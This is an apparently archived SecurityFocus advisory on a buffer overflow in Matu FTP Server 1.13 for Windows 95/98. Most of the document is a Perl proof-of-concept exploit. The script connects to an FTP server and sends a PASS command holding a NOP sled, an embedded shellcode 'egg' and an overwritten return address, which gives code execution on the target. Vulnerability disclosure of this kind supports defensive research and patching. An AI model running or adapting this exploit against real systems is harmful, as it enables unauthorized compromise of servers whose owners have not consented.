source: http://www.securityfocus.com/bid/4792/info Matu FTP Server is a freely available FTP server for Microsoft Windows 95 and 98 operating systems. Matu FTP Server is vulnerable to a buffer overflow condition. It is possible for a malicious user to craft a request that will result in code execution on the vulnerable system. This issue has been reported in Matu FTP Server 1.13. Other versions may also be affected. #!/usr/local/bin/perl #----------------------------------------------- # MatuFtpServer 1.1.3.0 exploit ( for Windows98 ) # written by Kanatoko <[email protected]> # http://www.jumperz.net/ #----------------------------------------------- use Socket; $connect_host = "target.example.com"; $port = 21; $iaddr = inet_aton( $connect_host ) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in( $port, $iaddr ); socket( SOCKET, PF_INET, SOCK_STREAM, 0 ) || die "Socket Error.\n"; connect( SOCKET, $sock_addr ) || die "Connect Error\n"; select( SOCKET ); $|=1; select( STDOUT ); #egg written by UNYUN (http://www.shadowpenguin.org/) #16bytes $egg = "\x43\x43\x43\x43\x43\x53\x53\x53"; $egg .= "\xB8\x2D\x23\xF5\xBF\x48\x50\xC3"; #0x0177F984 $buf = "\x90" x 1032; $buf .= $egg; $buf .= "\x8C\xF9\x77\x01"; $buf .= "A" x 696; print SOCKET "PASS $buf\r\n"; $hoge = <SOCKET>; print $hoge; -- #sorry for the bad english Kanatoko <[email protected]> http://www.jumperz.net/(Japanese)